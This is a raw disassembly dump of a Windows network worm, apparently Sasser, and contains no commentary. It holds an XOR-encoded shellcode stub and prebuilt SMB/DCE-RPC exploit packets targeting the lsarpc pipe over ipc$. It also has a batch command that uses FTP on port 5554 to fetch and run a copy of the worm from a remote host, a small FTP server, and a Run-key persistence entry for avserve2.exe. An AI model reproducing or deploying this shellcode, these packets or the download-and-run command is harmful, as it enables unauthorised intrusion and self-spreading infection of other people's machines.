dd 77E61BE6h, 77E6E4C8h, 77E99331h, 77E7A099h, 77E7AC37h
dd 77E684C6h, 77F5157Dh, 77E7751Ah, 77E7C2C4h, 77E6BD13h
dd 77E705B0h, 77E7A5FDh, 77F5722Fh, 77E7980Ah, 77F516F8h
dd 77E6C703h, 77E7A13Fh, 77E7849Fh, 77E7C866h, 77E641EBh
dd 77E77CCEh, 77E79D8Ch, 77F6183Eh, 77F51597h, 77E79E34h
dd 77E7C726h, 77E76E0Bh, 77E78406h, 77E781F9h, 77E77405h
dd 77E79F93h, 77E6177Ah, 77E7C938h, 77E7C486h, 77E75CB5h
dd 77E616B4h, 77E79C90h, 77EB9A84h, 77E9C5B1h, 77E7C9E1h
dd 77E79924h, 77E67702h, 77E77EE1h, 77E7C931h, 77E79C3Dh
dd 0
dd 77D4C96Ah, 0
dd 71AB868Dh, 71AB5690h, 71AB1AF4h, 71AB1746h, 71AB3C22h
dd 71AB3E5Dh, 71AB5DE2h, 71AB32CAh, 71AB401Ch, 71AB12F8h
dd 71AB2BBFh, 71AB41DAh, 71AB3ECEh, 71AB1A6Dh, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread_0 db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 ; DATA XREF: sub_402AC1+1F�o
dword_406004 dd 0 ; DATA XREF: sub_402AC1+1A�o
dword_406008 dd 0 ; DATA XREF: sub_402AC1+10�o
dd offset sub_403C6B
dword_406010 dd 0 ; DATA XREF: sub_402AC1:loc_402ACC�o
dword_406014 dd 0 ; DATA XREF: sub_402B10+65�o
dword_406018 dd 0 ; DATA XREF: sub_402B10:loc_402B70�o
dword_40601C dd 0 ; DATA XREF: sub_402B10+76�o
dword_406020 dd 4 dup(0) ; DATA XREF: sub_402B10:loc_402B81�o
off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 ; DATA XREF: sub_40159E+47E�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; DATA XREF: sub_40159E+16B�r
; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B08+1A�r
; sub_401B08+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B08+77�r
; sub_401B08+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B08+A8�r
; sub_401B08+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B08+2BC�r
; sub_401B08+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B08+184�r
; sub_401B08+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B08+1B9�r
; sub_401B08+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fh ; DATA XREF: .text:off_4068E4�o
dword_4068F0 dd 20303032h, 0A4B4Fh ; DATA XREF: .text:off_4068E0�o
dword_4068F8 dd 20363232h, 0A4B4Fh ; DATA XREF: .text:off_4068DC�o
dword_406900 dd 20303332h, 0A4B4Fh ; DATA XREF: .text:off_4068D8�o
dword_406908 dd 20313333h, 0A4B4Fh ; DATA XREF: .text:off_4068D4�o
dword_406910 dd 20303232h, 0A4B4Fh ; DATA XREF: .text:off_4068D0�o
aAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:off_4068C8�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 ; DATA XREF: sub_40159E+1CC�o
dword_406A34 dd 1CEC8166h ; DATA XREF: sub_40159E+D�r
dword_406A38 dd 0E4FF07h ; DATA XREF: sub_40159E+18�r
dword_406A3C dd 302E35h ; DATA XREF: sub_401A84+4A�o
dword_406A40 dd 312E35h ; DATA XREF: sub_401A84+27�o
aQuit db 'QUIT',0 ; DATA XREF: sub_401B08+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B08+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B08+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: sub_401B08+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B08+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B08+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B08+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; DATA XREF: sub_403590+E�r
; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 ; DATA XREF: sub_402810�r
dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; DATA XREF: sub_402D04+A�r
; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 ; DATA XREF: sub_402BC3+58�r
dword_406D74 dd 7 ; DATA XREF: sub_402BC3+5E�r
dword_406D78 dd 0Ah ; DATA XREF: sub_402D04+4�r
dword_406D7C dd 8Ch ; DATA XREF: sub_402BC3+82�r
; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; DATA XREF: .text:0040348F�o
; sub_403496+2�o
dword_406DA0 dd 2 ; DATA XREF: sub_4035C9+E�o
; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9+1B�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h ; DATA XREF: sub_4038A7+2F�o
dword_406E3C dd 82798260h, 21h, 0 ; DATA XREF: sub_4038A7+11D�r
dword_406E48 dd 0DFA6h ; DATA XREF: sub_4038A7+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; DATA XREF: sub_4038A7+3C�o
; sub_403CF4+5�r
align 10h
dword_406F30 dd 0A553C4C4h ; DATA XREF: sub_401000�r
; sub_401000+10�w ...
dword_406F34 dd 0 ; DATA XREF: sub_401210+6�w
; sub_401210+D�r
dword_406F38 dd 0 ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F3C dd 0 ; DATA XREF: sub_402680+3B�r
; sub_402680+91�w
dword_406F40 dd 0 ; DATA XREF: sub_40283E+84�w
; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 ; DATA XREF: sub_402934�r sub_402959�r ...
dd 3 dup(0)
dword_406F58 dd 0A28h ; DATA XREF: sub_40283E+52�w
dword_406F5C dd 501h ; DATA XREF: sub_40283E+49�w
dword_406F60 dd 5 ; DATA XREF: sub_40283E+3E�w
dword_406F64 dd 1 ; DATA XREF: sub_40283E+30�w
dword_406F68 dd 1 ; DATA XREF: sub_402E58+91�w
dword_406F6C dd 0CB0B00h ; DATA XREF: sub_402E58+89�w
dd 0
dword_406F74 dd 0CB0A80h ; DATA XREF: sub_402D9F+44�w
dd 3 dup(0)
off_406F84 dd offset aCM_unpackerPac ; DATA XREF: sub_402E58+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 ; DATA XREF: sub_402B10+27�w
dword_406F94 dd 0 ; DATA XREF: sub_402B10+4�r
; sub_402B10+8B�w
dword_406F98 dd 0 ; DATA XREF: sub_402BC3+3A�r
; sub_402BC3+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402E58:loc_402E6F�o
; .text:off_406F84�o
align 4
dd 31h dup(0)
dword_40707C dd 9 dup(0) ; DATA XREF: .text:00406624�o
; .text:00406638�o ...
dword_4070A0 dd 1 ; DATA XREF: sub_4030A5+2�r
; sub_4030A5+23�w ...
dword_4070A4 dd 0 ; DATA XREF: sub_403590+21�r
dword_4070A8 dd 1 ; DATA XREF: sub_40371C+26�r
; sub_40371C:loc_403786�w
dword_4070AC dd 1 ; DATA XREF: sub_4038A7:loc_403A22�r
; sub_403A40+4�w ...
dword_4070B0 dd 0 ; DATA XREF: sub_404573+3�r
; sub_404573+2E�w ...
dword_4070B4 dd 0 ; DATA XREF: sub_404573+43�w
; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; DATA XREF: sub_404573+4A�w
; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 ; DATA XREF: sub_40371C+7B�r
dd 3 dup(0)
dword_4070D4 dd 0 ; DATA XREF: sub_40371C+A6�r
; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 1 ; DATA XREF: sub_4046FE+28�r
; sub_4046FE+4C�w ...
dword_4070E0 dd 0 ; DATA XREF: sub_403CB6�r
dword_4070E4 dd 0 ; DATA XREF: sub_40494D�r
dword_4070E8 dd 10h ; DATA XREF: sub_403D2A+32�w
; sub_4043C7+5�r ...
dword_4070EC dd 0 ; DATA XREF: sub_403D93+239�r
; sub_403D93+259�r ...
dword_4070F0 dd 320650h ; DATA XREF: sub_403D2A+2D�w
; sub_403D93+310�w ...
dword_4070F4 dd 0 ; DATA XREF: sub_403D2A:loc_403D47�w
; sub_403D93+22C�r ...
dword_4070F8 dd 1 ; DATA XREF: sub_403D2A+24�w
; sub_403D68�r ...
dword_4070FC dd 320650h ; DATA XREF: sub_403D2A+15�w
; sub_403D68+8�r ...
dword_407100 dd 4E4h ; DATA XREF: sub_4038A7+14�r
; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; DATA XREF: sub_4038A7+123�o
; sub_4038A7+171�o ...
dword_40711C dd 0 ; DATA XREF: sub_4038A7+108�w
; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7+AF�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_407324 dd 0 ; DATA XREF: sub_4038A7+6E�w
; sub_4038A7+12B�w ...
dword_407328 dd 320000h ; DATA XREF: sub_403382+19�w
; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 0CB0EF0h ; DATA XREF: sub_4031D7:loc_4031F7�w
; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) ; DATA XREF: sub_4031D7+92�o
dword_407440 dd 20h ; DATA XREF: sub_4031D7+26�w
; sub_4031D7:loc_403261�r ...
dword_407444 dd 1 ; DATA XREF: sub_402D9F+AD�w
dword_407448 dd 1 ; DATA XREF: sub_402D47�r sub_402D9F+3�r ...
dword_40744C dd 0 ; DATA XREF: sub_402B10+3E�r
dword_407450 dd 0 ; DATA XREF: sub_402B10+35�r
; sub_402B10+57�r
dword_407454 dd 0 ; DATA XREF: sub_402AC1�r
dword_407458 dd 452340h ; DATA XREF: sub_40283E+7A�w
; sub_402D47+F�r ...
dd 6E9h dup(0)
_text ends
; Section 3. (virtual address 0001A000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 41A000h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_44283E
popa
jmp sub_40283E
start endp
; ---------------------------------------------------------------------------
db 0
byte_41A00D db 79h, 77h, 90h ; DATA XREF: .bss:off_44B610�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 759D6500h, 0B7D52F9Dh, 444FEF9Bh, 0D32FE4FBh
dd 625D19DDh, 7D93CE87h, 8954EF46h, 0D8376C80h, 0EC5B7D20h
dd 330637C2h, 421F93Fh, 0D6359079h, 0DA0F8F99h, 679ED416h
dd 7ED42BA8h, 4F76F21Eh, 0FC731Dh, 6014C00h, 7587C100h
dd 46h, 0
dd 0E00E000h, 2010B21h, 0B20037h, 360000h, 5C0000h, 119600h
dd 100000h, 0D00000h, 0
dd 100010h, 20000h, 100h, 0
dd 400h, 0
dd 1900000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 1800000h, 4C00h, 1500000h, 1CC00h, 6 dup(0)
dd 1600000h, 148800h, 14h dup(0)
dd 65742E00h, 7478h, 0B03C00h, 100000h, 0B03C00h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 5BD800h, 0D00000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 1B7800h, 1300000h, 1B7800h
dd 0B60000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 1CC00h, 1500000h, 1CC00h
dd 0D20000h, 3 dup(0)
dd 6000h, 65722EC0h, 636F6Ch, 149000h, 1600000h, 149000h
dd 0D60000h, 3 dup(0)
dd 2000h, 64652E02h, 617461h, 4C00h, 1800000h, 4C00h, 0EC0000h
dd 3 dup(0)
dd 2000h, 40h, 65h dup(0)
dd 1B800h, 31C30000h, 4C8B40C0h, 41F70424h, 604h, 8B0F7400h
dd 8B082444h, 89102454h, 3B802h
db 2 dup(0), 0C3h
; =============== S U B R O U T I N E =======================================
sub_41A433 proc near ; CODE XREF: .data:0041A55B�p
; .data:0041A589�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001006h
push large dword ptr fs:0
mov large fs:0, esp
loc_41A450: ; CODE XREF: sub_41A433+44�j
; sub_41A433+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41A47F
cmp esi, [esp+1Ch+arg_4]
jz short loc_41A47F
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41A450
call dword ptr [ebx+esi*4+8]
jmp short loc_41A450
; ---------------------------------------------------------------------------
